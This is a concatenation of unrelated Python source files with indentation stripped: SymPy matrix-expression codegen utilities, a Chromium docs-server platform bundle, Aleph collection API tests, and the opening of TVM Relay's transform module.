subindices = subindices[:-len(diagonal_indices)]
for index in summation_indices:
if index in dindices:
position = dindices.index(index)
contraction_indices.append(diagonal_indices[position])
diagonal_indices[position] = None
diagonal_indices = [i for i in diagonal_indices if i is not None]
for i, ind in enumerate(subindices):
if ind in summation_indices:
pass
if diagonal_indices:
subexpr = CodegenArrayDiagonal(subexpr.expr, *diagonal_indices)
else:
subexpr = subexpr.expr
axes_contraction = defaultdict(list)
for i, ind in enumerate(subindices):
if ind in summation_indices:
axes_contraction[ind].append(i)
subindices[i] = None
for k, v in axes_contraction.items():
contraction_indices.append(tuple(v))
free_indices = [i for i in subindices if i is not None]
indices_ret = list(free_indices)
indices_ret.sort(key=lambda x: free_indices.index(x))
return CodegenArrayContraction(
subexpr,
*contraction_indices,
free_indices=free_indices
), tuple(indices_ret)
if isinstance(expr, Mul):
args, indices = zip(*[_codegen_array_parse(arg) for arg in expr.args])
# Check if there are KroneckerDelta objects:
kronecker_delta_repl = {}
for arg in args:
if not isinstance(arg, KroneckerDelta):
continue
# Diagonalize two indices:
i, j = arg.indices
kindices = set(arg.indices)
if i in kronecker_delta_repl:
kindices.update(kronecker_delta_repl[i])
if j in kronecker_delta_repl:
kindices.update(kronecker_delta_repl[j])
kindices = frozenset(kindices)
for index in kindices:
kronecker_delta_repl[index] = kindices
# Remove KroneckerDelta objects, their relations should be handled by
# CodegenArrayDiagonal:
newargs = []
newindices = []
for arg, loc_indices in zip(args, indices):
if isinstance(arg, KroneckerDelta):
continue
newargs.append(arg)
newindices.append(loc_indices)
flattened_indices = [kronecker_delta_repl.get(j, j) for i in newindices for j in i]
diagonal_indices, ret_indices = _get_diagonal_indices(flattened_indices)
tp = CodegenArrayTensorProduct(*newargs)
if diagonal_indices:
return (CodegenArrayDiagonal(tp, *diagonal_indices), ret_indices)
else:
return tp, ret_indices
if isinstance(expr, MatrixElement):
indices = expr.args[1:]
diagonal_indices, ret_indices = _get_diagonal_indices(indices)
if diagonal_indices:
return (CodegenArrayDiagonal(expr.args[0], *diagonal_indices), ret_indices)
else:
return expr.args[0], ret_indices
if isinstance(expr, Indexed):
indices = expr.indices
diagonal_indices, ret_indices = _get_diagonal_indices(indices)
if diagonal_indices:
return (CodegenArrayDiagonal(expr.base, *diagonal_indices), ret_indices)
else:
return expr.args[0], ret_indices
if isinstance(expr, IndexedBase):
raise NotImplementedError
if isinstance(expr, KroneckerDelta):
return expr, expr.indices
if isinstance(expr, Add):
args, indices = zip(*[_codegen_array_parse(arg) for arg in expr.args])
args = list(args)
# Check if all indices are compatible. Otherwise expand the dimensions:
index0set = set(indices[0])
index0 = indices[0]
for i in range(1, len(args)):
if set(indices[i]) != index0set:
raise NotImplementedError("indices must be the same")
permutation = Permutation([index0.index(j) for j in indices[i]])
# Perform index permutations:
args[i] = CodegenArrayPermuteDims(args[i], permutation)
return CodegenArrayElementwiseAdd(*args), index0
return expr, ()
raise NotImplementedError("could not recognize expression %s" % expr)
def _parse_matrix_expression(expr):
if isinstance(expr, MatMul):
args_nonmat = []
args = []
contractions = []
for arg in expr.args:
if isinstance(arg, MatrixExpr):
args.append(arg)
else:
args_nonmat.append(arg)
contractions = [(2*i+1, 2*i+2) for i in range(len(args)-1)]
return Mul.fromiter(args_nonmat)*CodegenArrayContraction(
CodegenArrayTensorProduct(*[_parse_matrix_expression(arg) for arg in args]),
*contractions
)
elif isinstance(expr, MatAdd):
return CodegenArrayElementwiseAdd(
*[_parse_matrix_expression(arg) for arg in expr.args]
)
elif isinstance(expr, Transpose):
return CodegenArrayPermuteDims(
_parse_matrix_expression(expr.args[0]), [1, 0]
)
else:
return expr
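# Illustrative note (a hedged sketch, consistent with the from_MatMul doctest
# above): for a plain MatMul such as A*B this returns
#     CodegenArrayContraction(CodegenArrayTensorProduct(A, B), (1, 2)),
# i.e. neighbouring matrices are linked by pairwise contractions.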
def parse_indexed_expression(expr, first_indices=None):
r"""
Parse indexed expression into a form useful for code generation.
Examples
========
>>> from sympy.codegen.array_utils import parse_indexed_expression
>>> from sympy import MatrixSymbol, Sum, symbols
>>> from sympy.combinatorics import Permutation
>>> i, j, k, d = symbols("i j k d")
>>> M = MatrixSymbol("M", d, d)
>>> N = MatrixSymbol("N", d, d)
Recognize the trace in summation form:
>>> expr = Sum(M[i, i], (i, 0, d-1))
>>> parse_indexed_expression(expr)
CodegenArrayContraction(M, (0, 1))
Recognize the extraction of the diagonal by using the same index `i` on
both axes of the matrix:
>>> expr = M[i, i]
>>> parse_indexed_expression(expr)
CodegenArrayDiagonal(M, (0, 1))
This function can help perform the transformation expressed in two
different mathematical notations as:
`\sum_{j=0}^{N-1} A_{i,j} B_{j,k} \Longrightarrow \mathbf{A}\cdot \mathbf{B}`
Recognize the matrix multiplication in summation form:
>>> expr = Sum(M[i, j]*N[j, k], (j, 0, d-1))
>>> parse_indexed_expression(expr)
CodegenArrayContraction(CodegenArrayTensorProduct(M, N), (1, 2))
Specify that ``k`` has to be the starting index:
>>> parse_indexed_expression(expr, first_indices=[k])
CodegenArrayPermuteDims(CodegenArrayContraction(CodegenArrayTensorProduct(M, N), (1, 2)), (0 1))
"""
result, indices = _codegen_array_parse(expr)
if not first_indices:
return result
for i in list(first_indices):  # iterate over a copy; items may be removed below
if i not in indices:
first_indices.remove(i)
#raise ValueError("index %s not found or not a free index" % i)
first_indices.extend([i for i in indices if i not in first_indices])
permutation = [first_indices.index(i) for i in indices]
return CodegenArrayPermuteDims(result, permutation)
def _has_multiple_lines(expr):
if isinstance(expr, _RecognizeMatMulLines):
return True
if isinstance(expr, _RecognizeMatOp):
return expr.multiple_lines
return False
class _RecognizeMatOp(object):
"""
Class to help parsing matrix multiplication lines.
"""
def __init__(self, operator, args):
self.operator = operator
self.args = args
if any(_has_multiple_lines(arg) for arg in args):
multiple_lines = True
else:
multiple_lines = False
self.multiple_lines = multiple_lines
def rank(self):
if self.operator == Trace:
return 0
# TODO: check
return 2
def __repr__(self):
op = self.operator
if op == MatMul:
s = "*"
elif op == MatAdd:
s = "+"
else:
s = op.__name__
return "_RecognizeMatOp(%s, %s)" % (s, repr(self.args))
return "_RecognizeMatOp(%s)" % (s.join(repr(i) for i in self.args))
def __eq__(self, other):
if not isinstance(other, type(self)):
return False
if self.operator != other.operator:
return False
if self.args != other.args:
return False
return True
def __iter__(self):
return iter(self.args)
class _RecognizeMatMulLines(list):
"""
This class handles multiple parsed multiplication lines.
"""
def __new__(cls, args):
if len(args) == 1:
return args[0]
return list.__new__(cls, args)
def rank(self):
return reduce(lambda x, y: x*y, [get_rank(i) for i in self], S.One)
def __repr__(self):
return "_RecognizeMatMulLines(%s)" % super(_RecognizeMatMulLines, self).__repr__()
def _support_function_tp1_recognize(contraction_indices, args):
if not isinstance(args, list):
args = [args]
subranks = [get_rank(i) for i in args]
coeff = reduce(lambda x, y: x*y, [arg for arg, srank in zip(args, subranks) if srank == 0], S.One)
mapping = _get_mapping_from_subranks(subranks)
reverse_mapping = {v:k for k, v in mapping.items()}
args, dlinks = _get_contraction_links(args, subranks, *contraction_indices)
flatten_contractions = [j for i in contraction_indices for j in i]
total_rank = sum(subranks)
# TODO: turn `free_indices` into a list?
free_indices = {i: i for i in range(total_rank) if i not in flatten_contractions}
return_list = []
while dlinks:
if free_indices:
first_index, starting_argind = min(free_indices.items(), key=lambda x: x[1])
free_indices.pop(first_index)
starting_argind, starting_pos = mapping[starting_argind]
else:
# Maybe a Trace
first_index = None
starting_argind = min(dlinks)
starting_pos = 0
current_argind, current_pos = starting_argind, starting_pos
matmul_args = []
last_index = None
while True:
elem = args[current_argind]
if current_pos == 1:
elem = _RecognizeMatOp(Transpose, [elem])
matmul_args.append(elem)
other_pos = 1 - current_pos
if current_argind not in dlinks:
other_absolute = reverse_mapping[current_argind, other_pos]
free_indices.pop(other_absolute, None)
break
link_dict = dlinks.pop(current_argind)
if other_pos not in link_dict:
if free_indices:
last_index = [i for i, j in free_indices.items() if mapping[j] == (current_argind, other_pos)][0]
else:
last_index = None
break
if len(link_dict) > 2:
raise NotImplementedError("not a matrix multiplication line")
# Get the last element of `link_dict` as the next link. The last
# element is the correct start for trace expressions:
current_argind, current_pos = link_dict[other_pos]
if current_argind == starting_argind:
# This is a trace:
if len(matmul_args) > 1:
matmul_args = [_RecognizeMatOp(Trace, [_RecognizeMatOp(MatMul, matmul_args)])]
elif args[current_argind].shape != (1, 1):
matmul_args = [_RecognizeMatOp(Trace, matmul_args)]
break
dlinks.pop(starting_argind, None)
free_indices.pop(last_index, None)
return_list.append(_RecognizeMatOp(MatMul, matmul_args))
if coeff != 1:
# Let's inject the coefficient:
return_list[0].args.insert(0, coeff)
return _RecognizeMatMulLines(return_list)
def recognize_matrix_expression(expr):
r"""
Recognize matrix expressions in codegen objects.
If more than one matrix multiplication line has been detected, return a
list with the matrix expressions.
Examples
========
>>> from sympy import MatrixSymbol, MatrixExpr, Sum, Symbol
>>> from sympy.abc import i, j, k, l, N
>>> from sympy.codegen.array_utils import CodegenArrayContraction, CodegenArrayTensorProduct
>>> from sympy.codegen.array_utils import recognize_matrix_expression, parse_indexed_expression
>>> A = MatrixSymbol("A", N, N)
>>> B = MatrixSymbol("B", N, N)
>>> C = MatrixSymbol("C", N, N)
>>> D = MatrixSymbol("D", N, N)
>>> expr = Sum(A[i, j]*B[j, k], (j, 0, N-1))
>>> cg = parse_indexed_expression(expr)
>>> recognize_matrix_expression(cg)
A*B
>>> cg = parse_indexed_expression(expr, first_indices=[k])
>>> recognize_matrix_expression(cg)
(A*B).T
Transposition is detected:
>>> expr = Sum(A[j, i]*B[j, k], (j, 0, N-1))
>>> cg = parse_indexed_expression(expr)
>>> recognize_matrix_expression(cg)
A.T*B
>>> cg = parse_indexed_expression(expr, first_indices=[k])
>>> recognize_matrix_expression(cg)
(A.T*B).T
Detect the trace:
>>> expr = Sum(A[i, i], (i, 0, N-1))
>>> cg = parse_indexed_expression(expr)
>>> recognize_matrix_expression(cg)
Trace(A)
Recognize some more complex traces:
>>> expr = Sum(A[i, j]*B[j, i], (i, 0, N-1), (j, 0, N-1))
>>> cg = parse_indexed_expression(expr)
>>> recognize_matrix_expression(cg)
Trace(A*B)
More complicated expressions:
>>> expr = Sum(A[i, j]*B[k, j]*A[l, k], (j, 0, N-1), (k, 0, N-1))
>>> cg = parse_indexed_expression(expr)
>>> recognize_matrix_expression(cg)
A*B.T*A.T
Expressions constructed from matrix expressions do not contain literal
indices; the positions of free indices are returned instead:
>>> expr = A*B
>>> cg = CodegenArrayContraction.from_MatMul(expr)
>>> recognize_matrix_expression(cg)
A*B
If more than one line of matrix multiplications is detected, return
separate matrix multiplication factors:
>>> cg = CodegenArrayContraction(CodegenArrayTensorProduct(A, B, C, D), (1, 2), (5, 6))
>>> recognize_matrix_expression(cg)
[A*B, C*D]
The two lines have free indices at axes 0, 3 and 4, 7, respectively.
"""
# TODO: expr has to be a CodegenArray... type
rec = _recognize_matrix_expression(expr)
return _unfold_recognized_expr(rec)
def _recognize_matrix_expression(expr):
if isinstance(expr, CodegenArrayContraction):
# Apply some transformations:
expr = expr.flatten_contraction_of_diagonal()
expr = expr.split_multiple_contractions()
args = _recognize_matrix_expression(expr.expr)
contraction_indices = expr.contraction_indices
if isinstance(args, _RecognizeMatOp) and args.operator == MatAdd:
addends = []
for arg in args.args:
addends.append(_support_function_tp1_recognize(contraction_indices, arg))
return _RecognizeMatOp(MatAdd, addends)
elif isinstance(args, _RecognizeMatMulLines):
return _support_function_tp1_recognize(contraction_indices, args)
return _support_function_tp1_recognize(contraction_indices, [args])
elif isinstance(expr, CodegenArrayElementwiseAdd):
add_args = []
for arg in expr.args:
add_args.append(_recognize_matrix_expression(arg))
return _RecognizeMatOp(MatAdd, add_args)
elif isinstance(expr, (MatrixSymbol, IndexedBase)):
return expr
elif isinstance(expr, CodegenArrayPermuteDims):
if expr.permutation.array_form == [1, 0]:
return _RecognizeMatOp(Transpose, [_recognize_matrix_expression(expr.expr)])
elif isinstance(expr.expr, CodegenArrayTensorProduct):
ranks = expr.expr.subranks
newrange = [expr.permutation(i) for i in range(sum(ranks))]
newpos = []
counter = 0
for rank in ranks:
newpos.append(newrange[counter:counter+rank])
counter += rank
newargs = []
for pos, arg in zip(newpos, expr.expr.args):
if pos == sorted(pos):
newargs.append((_recognize_matrix_expression(arg), pos[0]))
elif len(pos) == 2:
newargs.append((_RecognizeMatOp(Transpose, [_recognize_matrix_expression(arg)]), pos[0]))
else:
raise NotImplementedError
newargs.sort(key=lambda x: x[1])
newargs = [i[0] for i in newargs]
return _RecognizeMatMulLines(newargs)
else:
raise NotImplementedError
elif isinstance(expr, CodegenArrayTensorProduct):
args = [_recognize_matrix_expression(arg) for arg in expr.args]
multiple_lines = [_has_multiple_lines(arg) for arg in args]
if any(multiple_lines):
if any(a.operator != MatAdd for i, a in enumerate(args) if multiple_lines[i] and isinstance(a, _RecognizeMatOp)):
raise NotImplementedError
getargs = lambda x: x.args if isinstance(x, _RecognizeMatOp) else list(x)
expand_args = [getargs(arg) if multiple_lines[i] else [arg] for i, arg in enumerate(args)]
it = itertools.product(*expand_args)
ret = _RecognizeMatOp(MatAdd, [_RecognizeMatMulLines([k for j in i for k in (j if isinstance(j, _RecognizeMatMulLines) else [j])]) for i in it])
return ret
return _RecognizeMatMulLines(args)
elif isinstance(expr, CodegenArrayDiagonal):
pexpr = expr.transform_to_product()
if expr == pexpr:
return expr
return _recognize_matrix_expression(pexpr)
elif isinstance(expr, Transpose):
return expr
elif isinstance(expr, MatrixExpr):
return expr
return expr
def _suppress_trivial_dims_in_tensor_product(mat_list):
# Recognize expressions like [x, y] with shape (k, 1, k, 1) as `x*y.T`.
# The matrix expression has to be equivalent to the tensor product of the matrices, with trivial dimensions (i.e. dim=1) dropped.
# That is, add contractions over trivial dimensions:
mat_11 = []
mat_k1 = []
for mat in mat_list:
if mat.shape == (1, 1):
mat_11.append(mat)
elif 1 in mat.shape:
if mat.shape[0] == 1:
mat_k1.append(mat.T)
else:
mat_k1.append(mat)
else:
return mat_list
if len(mat_k1) > 2:
return mat_list
a = MatMul.fromiter(mat_k1[:1])
b = MatMul.fromiter(mat_k1[1:])
x = MatMul.fromiter(mat_11)
return a*x*b.T
def _unfold_recognized_expr(expr):
if isinstance(expr, _RecognizeMatOp):
return expr.operator(*[_unfold_recognized_expr(i) for i in expr.args])
elif isinstance(expr, _RecognizeMatMulLines):
unfolded = [_unfold_recognized_expr(i) for i in expr]
mat_list = [i for i in unfolded if isinstance(i, MatrixExpr)]
scalar_list = [i for i in unfolded if i not in mat_list]
scalar = Mul.fromiter(scalar_list)
mat_list = [i.doit() for i in mat_list]
mat_list = [i for i in mat_list if not (i.shape == (1, 1) and i.is_Identity)]
if mat_list:
mat_list[0] *= scalar
if len(mat_list) == 1:
return mat_list[0].doit()
else:
return _suppress_trivial_dims_in_tensor_product(mat_list)
else:
return scalar
else:
return expr
def _apply_recursively_over_nested_lists(func, arr):
if isinstance(arr, (tuple, list, Tuple)):
return tuple(_apply_recursively_over_nested_lists(func, i) for i in arr)
elif isinstance(arr, Tuple):
return Tuple.fromiter(_apply_recursively_over_nested_lists(func, i) for i in arr)
else:
return func(arr)
def _build_push_indices_up_func_transformation(flattened_contraction_indices):
shifts = {0: 0}
i = 0
cumulative = 0
while i < len(flattened_contraction_indices):
j = 1
while i+j < len(flattened_contraction_indices):
if flattened_contraction_indices[i] + j != flattened_contraction_indices[i+j]:
break
j += 1
cumulative += j
shifts[flattened_contraction_indices[i]] = cumulative
i += j
shift_keys = sorted(shifts.keys())
def func(idx):
return shifts[shift_keys[bisect.bisect_right(shift_keys, idx)-1]]
def transform(j):
if j in flattened_contraction_indices:
return None
else:
return j - func(j)
return transform
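# Illustrative note (a small worked example, added for clarity): with
# flattened_contraction_indices = [1, 2] the resulting transform maps
# 0 -> 0 and 3 -> 1, and returns None for the contracted indices 1 and 2,
# i.e. the free indices are renumbered as if the contracted ones were removed.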
def _build_push_indices_down_func_transformation(flattened_contraction_indices):
N = flattened_contraction_indices[-1]+2
shifts = [i for i in range(N) if i not in flattened_contraction_indices]
def transform(j):
if j < len(shifts):
return shifts[j]
else:
return j + shifts[-1] - len(shifts) + 1
return transform
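# Illustrative note (a small worked example, added for clarity): with
# flattened_contraction_indices = [1, 2] the transform maps 0 -> 0, 1 -> 3
# and 2 -> 4, i.e. it is the inverse renumbering of the "push up"
# transformation above, skipping over the contracted positions.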
|
from .test_stat import *
from .test_pyplotlm import *
|
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from api_categorizer import APICategorizer
from api_models import APIModels
from availability_finder import AvailabilityFinder
from empty_dir_file_system import EmptyDirFileSystem
from environment import IsDevServer
from features_bundle import FeaturesBundle
from future import All
from platform_util import GetPlatforms, PlatformToExtensionType
from reference_resolver import ReferenceResolver
from samples_model import SamplesModel
from future import Future
from schema_processor import SchemaProcessorFactory
class _PlatformData(object):
def __init__(self):
self.features_bundle = None
self.api_models = None
self.reference_resolver = None
self.availability_finder = None
self.api_categorizer = None
self.samples_model = None
class PlatformBundle(object):
'''Creates various objects for different platforms
'''
def __init__(self,
branch_utility,
compiled_fs_factory,
host_fs_at_master,
host_file_system_iterator,
object_store_creator,
base_path):
self._branch_utility = branch_utility
self._compiled_fs_factory = compiled_fs_factory
self._host_fs_at_master = host_fs_at_master
self._host_file_system_iterator = host_file_system_iterator
self._object_store_creator = object_store_creator
self._base_path = base_path
self._platform_data = dict((p, _PlatformData()) for p in GetPlatforms())
def GetSamplesModel(self, platform):
if self._platform_data[platform].samples_model is None:
# Note: samples are super slow in the dev server because it doesn't
# support async fetch, so disable them.
if IsDevServer():
extension_samples_fs = EmptyDirFileSystem()
app_samples_fs = EmptyDirFileSystem()
else:
extension_samples_fs = self._host_fs_at_master
# TODO(kalman): Re-enable the apps samples, see http://crbug.com/344097.
app_samples_fs = EmptyDirFileSystem()
#app_samples_fs = github_file_system_provider.Create(
# 'GoogleChrome', 'chrome-app-samples')
self._platform_data[platform].samples_model = SamplesModel(
extension_samples_fs,
app_samples_fs,
self._compiled_fs_factory,
self.GetReferenceResolver(platform),
self._base_path,
platform)
return self._platform_data[platform].samples_model
def GetFeaturesBundle(self, platform):
if self._platform_data[platform].features_bundle is None:
self._platform_data[platform].features_bundle = FeaturesBundle(
self._host_fs_at_master,
self._compiled_fs_factory,
self._object_store_creator,
platform)
return self._platform_data[platform].features_bundle
def GetAPIModels(self, platform):
if self._platform_data[platform].api_models is None:
# TODO(danielj41): Filter APIModels data here rather than passing the
# platform.
self._platform_data[platform].api_models = APIModels(
self.GetFeaturesBundle(platform),
self._compiled_fs_factory,
self._host_fs_at_master,
self._object_store_creator,
platform,
SchemaProcessorFactory(
Future(callback=lambda: self.GetReferenceResolver(platform)),
Future(callback=lambda: self.GetAPIModels(platform)),
Future(callback=lambda: self.GetFeaturesBundle(platform)),
self._compiled_fs_factory,
self._host_fs_at_master))
return self._platform_data[platform].api_models
def GetReferenceResolver(self, platform):
if self._platform_data[platform].reference_resolver is None:
self._platform_data[platform].reference_resolver = ReferenceResolver(
self.GetAPIModels(platform),
self._object_store_creator.Create(ReferenceResolver,
category=platform))
return self._platform_data[platform].reference_resolver
def GetAvailabilityFinder(self, platform):
if self._platform_data[platform].availability_finder is None:
self._platform_data[platform].availability_finder = AvailabilityFinder(
self._branch_utility,
self._compiled_fs_factory,
self._host_file_system_iterator,
self._host_fs_at_master,
self._object_store_creator,
platform,
SchemaProcessorFactory(
Future(callback=lambda: self.GetReferenceResolver(platform)),
Future(callback=lambda: self.GetAPIModels(platform)),
Future(callback=lambda: self.GetFeaturesBundle(platform)),
self._compiled_fs_factory,
self._host_fs_at_master))
return self._platform_data[platform].availability_finder
def GetAPICategorizer(self, platform):
if self._platform_data[platform].api_categorizer is None:
self._platform_data[platform].api_categorizer = APICategorizer(
self._host_fs_at_master,
self._compiled_fs_factory,
platform)
return self._platform_data[platform].api_categorizer
def Refresh(self):
return All(self.GetAPIModels(platform).Refresh()
for platform in self._platform_data.keys())
def GetIdentity(self):
return self._host_fs_at_master.GetIdentity()
|
import json
from aleph.core import db
from aleph.authz import Authz
from aleph.model import EntitySet
from aleph.logic.collections import compute_collection
from aleph.views.util import validate
from aleph.tests.util import TestCase, JSON
class CollectionsApiTestCase(TestCase):
def setUp(self):
super(CollectionsApiTestCase, self).setUp()
self.rolex = self.create_user(foreign_id="user_3")
self.col = self.create_collection(
label="Test Collection",
foreign_id="test_coll_entities_api",
category="leak",
countries=["us"],
languages=["eng"],
)
self.ent = self.create_entity(
{
"schema": "Person",
"properties": {"name": "Winnie the Pooh", "country": "za"},
},
self.col,
)
db.session.add(self.ent)
db.session.commit()
def test_index(self):
res = self.client.get("/api/2/collections")
assert res.status_code == 200, res
assert res.json["total"] == 0, res.json
_, headers = self.login(is_admin=True)
res = self.client.get("/api/2/collections", headers=headers)
assert res.status_code == 200, res
assert res.json["total"] == 1, res.json
assert res.json["results"][0]["languages"] == ["eng"], res.json
assert res.json["results"][0]["countries"] == ["us"], res.json
assert validate(res.json["results"][0], "Collection")
def test_sitemap(self):
res = self.client.get("/api/2/sitemap.xml")
assert res.status_code == 200, res
assert b"<loc>" not in res.data, res.data
self.grant_publish(self.col)
res = self.client.get("/api/2/sitemap.xml")
assert b"<loc>" in res.data, res.data
def test_view(self):
res = self.client.get("/api/2/collections/%s" % self.col.id)
assert res.status_code == 403, res
_, headers = self.login(is_admin=True)
res = self.client.get("/api/2/collections/%s" % self.col.id, headers=headers)
assert res.status_code == 200, res
assert "test_coll" in res.json["foreign_id"], res.json
assert "Winnie" not in res.json["label"], res.json
assert validate(res.json, "Collection")
def test_update_valid(self):
_, headers = self.login(is_admin=True)
url = "/api/2/collections/%s" % self.col.id
res = self.client.get(url, headers=headers)
assert res.status_code == 200, res
data = res.json
data["label"] = "Collected Collection"
res = self.client.post(
url, data=json.dumps(data), headers=headers, content_type=JSON
)
assert res.status_code == 200, res.json
assert "Collected" in res.json["label"], res.json
assert validate(res.json, "Collection")
def test_update_no_label(self):
_, headers = self.login(is_admin=True)
url = "/api/2/collections/%s" % self.col.id
res = self.client.get(url, headers=headers)
data = res.json
data["label"] = ""
res = self.client.post(
url, data=json.dumps(data), headers=headers, content_type=JSON
)
assert res.status_code == 400, res.json
res = self.client.get(url, headers=headers)
data = res.json
data["category"] = "banana"
res = self.client.post(
url, data=json.dumps(data), headers=headers, content_type=JSON
)
assert res.status_code == 400, res.json
def test_delete(self):
_, headers = self.login(is_admin=True)
url = "/api/2/collections/%s" % self.col.id
res = self.client.get(url, headers=headers)
assert res.status_code == 200, res
res = self.client.delete(url, headers=headers)
assert res.status_code == 204, res
res = self.client.get(url, headers=headers)
assert res.status_code == 404, res
def test_bulk_api(self):
_, headers = self.login(is_admin=True)
data = json.dumps(
[
{
"id": "4345800498380953840",
"schema": "Person",
"properties": {"name": "Osama bin Laden"},
},
{
"id": "7598743983789743598",
"schema": "Person",
"properties": {"name": "Osama bin Laden"},
},
]
)
url = "/api/2/collections/%s/_bulk" % self.col.id
res = self.client.post(url, data=data)
assert res.status_code == 403, res
res = self.client.post(url, headers=headers, data=data)
assert res.status_code == 204, res
query = "/api/2/entities?filter:schemata=Thing&filter:collection_id=%s"
query = query % self.col.id
res = self.client.get(query, headers=headers)
assert res.json["total"] == 2, res.json
data = [{"schema": "Person", "properties": {"name": "Osama bin Laden"}}]
res = self.client.post(url, headers=headers, data=json.dumps(data))
assert res.status_code == 400, res
res = self.client.get(query, headers=headers)
assert res.json["total"] == 2, res.json
data = [
{
"id": "7598743983789743598",
"schema": "Lollipop",
"properties": {"name": "Osama bin Laden"},
}
]
res = self.client.post(url, headers=headers, data=json.dumps(data))
assert res.status_code == 400, res
def test_bulk_entitysets_api(self):
role, headers = self.login(is_admin=True)
authz = Authz.from_role(role)
data = {"type": EntitySet.LIST, "label": "Foo"}
eset = EntitySet.create(data, self.col, authz)
db.session.commit()
eset_id = eset.id
data = json.dumps(
[
{
"id": "4345800498380953840",
"schema": "Person",
"properties": {"name": "Osama bin Laden"},
},
{
"id": "7598743983789743598",
"schema": "Person",
"properties": {"name": "Osama bin Laden"},
},
]
)
url = "/api/2/collections/%s/_bulk?entityset_id=%s" % (self.col.id, eset_id)
res = self.client.post(url, headers=headers, data=data)
assert res.status_code == 204, res
query = "/api/2/entitysets/%s/entities?filter:schema=Person" % eset_id
res = self.client.get(query, headers=headers)
assert res.json["total"] == 2, res.json
def test_statistics(self):
self.load_fixtures()
compute_collection(self.private_coll, sync=True)
_, headers = self.login(is_admin=True)
url = "/api/2/collections/%s" % self.private_coll.id
res = self.client.get(url, headers=headers)
assert res.status_code == 200, res
stats = res.json["statistics"]
assert "Folder" in stats["schema"]["values"], stats
assert "vladimir_l@example.com" in stats["emails"]["values"], stats
def test_status(self):
_, headers = self.login(is_admin=True)
url = "/api/2/collections/%s/status" % self.col.id
res = self.client.get(url)
assert res.status_code == 403, res
res = self.client.get(url, headers=headers)
assert res.status_code == 200, res
assert 0 == res.json["pending"], res.json
meta = {
"countries": ["de", "us"],
"languages": ["eng"],
"mime_type": "text/csv",
"source_url": "http://pudo.org/experts.csv",
"collection_id": self.col.id,
}
csv_path = self.get_fixture_path("experts.csv")
data = {
"meta": json.dumps(meta),
"foo": open(csv_path, "rb"),
}
ingest_url = "/api/2/collections/%s/ingest" % self.col.id
res = self.client.post(ingest_url, data=data, headers=headers)
assert res.status_code == 201, res
res = self.client.get(url, headers=headers)
assert res.status_code == 200, res
assert 1 == res.json["pending"], res.json
assert validate(res.json, "CollectionStatus")
res = self.client.delete(url)
assert res.status_code == 403, res
res = self.client.delete(url, headers=headers)
assert res.status_code == 204, res
res = self.client.get(url, headers=headers)
assert res.status_code == 200, res
assert 0 == res.json["pending"], res.json
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=invalid-name, unused-argument, missing-docstring, unused-import
"""
Relay pass transformation infrastructure.
"""
import functools
import inspect
import types
import warnings
import tvm.ir
from tvm import relay, te
from tvm.runtime import ndarray as _nd
from . import _ffi_api
from ..backend.utils import mangle_module_name
def build_config(opt_level=2, required_pass=None, disabled_pass=None, trace=None):
"""Configure the build behavior by setting config variables. This function
will be deprecated in TVM v0.7. Instead, we should directly use
tvm.transform.PassContext.
Parameters
----------
opt_level: int, optional
Optimization level. The optimization pass names and levels are as follows:
.. code-block:: python
OPT_PASS_LEVEL = {
"SimplifyInference": 0,
"OpFusion": 1,
"FoldConstant": 2,
"FoldScaleAxis": 3,
"AlterOpLayout": 3,
"CanonicalizeOps": 3,
"CanonicalizeCast": 3,
"EliminateCommonSubexpr": 3,
"CombineParallelConv2D": 4,
"CombineParallelDense": 4,
"CombineParallelBatchMatmul": 4,
"FastMath": 4
}
required_pass: set of str, optional
Optimization passes that are required regardless of optimization level.
disabled_pass: set of str, optional
Optimization passes to be disabled during optimization.
trace: Callable[[IRModule, PassInfo, bool], None]
A tracing function for debugging or introspection.
Returns
-------
pass_context: PassContext
The pass context for optimizations.
"""
warnings.warn(
"relay.build_config will be deprecated. Please use \
tvm.transform.PassContext directly",
DeprecationWarning,
)
return tvm.transform.PassContext(opt_level, required_pass, disabled_pass, trace)
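# A minimal sketch of the recommended replacement (added for illustration;
# assumes an existing ``tvm.IRModule`` called ``mod`` and an LLVM target,
# not tied to any particular workload):
#
#     with tvm.transform.PassContext(opt_level=3, disabled_pass=["AlterOpLayout"]):
#         lib = relay.build(mod, target="llvm")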
@tvm._ffi.register_object("relay.FunctionPass")
class FunctionPass(tvm.ir.transform.Pass):
"""A pass that works on each tvm.relay.Function in a module. A function
pass class should be created through `function_pass`.
"""
def InferType():
"""Infer the type of an expr.
Returns
-------
ret : tvm.transform.Pass
The registered type inference pass.
"""
return _ffi_api.InferType()
def InferTypeLocal(expr):
"""Infer the type of a single expr, reusing type information to do so.
This populates the checked_type field in expr. We assume existing type information
in the graph is correct!
Parameters
----------
expr: relay.Expr
The expression we want to know the type of
Returns
-------
type: relay.Type
The type of the expression
"""
return _ffi_api.InferTypeLocal(expr)
def FoldScaleAxis():
"""Fold the scaling of axis into weights of conv2d/dense. This pass will
invoke both forward and backward scale folding.
Returns
-------
ret : tvm.transform.Pass
The registered pass to fold expressions.
Note
----
Internally, we will call backward_fold_scale_axis before using
forward_fold_scale_axis as backward folding targets the common conv->bn
pattern.
"""
return _ffi_api.FoldScaleAxis()
def BackwardFoldScaleAxis():
"""Backward fold axis scaling into weights of conv2d/dense.
Returns
-------
ret : tvm.transform.Pass
The registered pass to backward fold expressions.
Note
----
It is recommended to call backward_fold_scale_axis
before using forward_fold_scale_axis as backward folding targets the common
conv->bn pattern.
"""
return _ffi_api.BackwardFoldScaleAxis()
def RemoveUnusedFunctions(entry_functions=None):
"""Remove unused global relay functions in a relay module.
Parameters
----------
entry_functions: list[string]
The set of entry functions to start from.
Returns
-------
ret : tvm.transform.Pass
The registered pass to remove unused functions.
"""
if entry_functions is None:
entry_functions = ["main"]
return _ffi_api.RemoveUnusedFunctions(entry_functions)
def ForwardFoldScaleAxis():
"""Fold the scaling of axis into weights of conv2d/dense.
Returns
-------
ret : tvm.transform.Pass
The registered pass to forward fold expressions.
Note
----
